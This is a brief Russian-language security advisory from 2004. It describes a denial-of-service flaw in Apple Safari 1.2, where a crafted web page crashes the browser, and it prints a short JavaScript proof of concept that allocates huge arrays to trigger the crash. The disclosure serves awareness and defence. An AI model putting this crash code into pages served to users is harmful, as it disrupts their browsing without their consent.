Security Lab

Аварийное завершение работы большим Javascript масивом в Apple Safari браузере

Дата публикации:21.03.2004
Всего просмотров:1513
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Apple Safari 1.2

Описание: Уязвимость обнаружена в Apple Safari браузере. Удаленный пользователь может создать HMTL, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера.

~ var a = new Array(99999999999999999999999);
~ a[0+5]="AAAAA";
var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));

URL производителя:http://www.apple.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Safari javascript array overflow